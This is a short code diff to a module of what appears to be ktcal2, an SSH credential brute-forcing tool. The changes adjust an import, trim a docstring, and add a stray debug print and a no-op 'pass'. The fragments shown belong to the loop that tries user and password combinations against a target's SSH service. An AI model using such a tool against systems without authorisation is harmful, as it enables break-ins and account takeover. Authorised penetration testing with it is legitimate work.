@@ -36,7 +36,7 @@ __author__ = 'cr0hn - cr0hn<-at->cr0hn.com (@ggdaniel)'
 import asyncio
 import asyncssh
 
-from ktcal2.lib.data import FoundCredential
+from .data import FoundCredential
 
 loop = None
 result_user = None
@@ -50,9 +50,6 @@ def _check_credentials(target, user, password, delay, sem_coroutines, port=22, d
     """
     Check a concrete credential.
     
-    :param future: Future object, from asyncio library.
-    :type future: Future
-    
     :param target: target with SSH service running
     :type target: str
 
@@ -69,7 +66,7 @@ def _check_credentials(target, user, password, delay, sem_coroutines, port=22, d
         with (yield from sem_coroutines):
             global counter
             counter += 1
-
+            print(verbosity_level)
             if display_func is not None:
                 if verbosity_level > 1:
                     msg = "\r [*] Testing... %s credentials (%s:%s)%s" % (counter, user, password, " " * 4)
@@ -135,6 +132,7 @@ def ssh_check(params):
                    for password in password_list]
 
         try:
+            pass
             loop.run_until_complete(asyncio.wait(futures))
         except RuntimeError:
             # If some coroutine stops the loop, this exception will raise
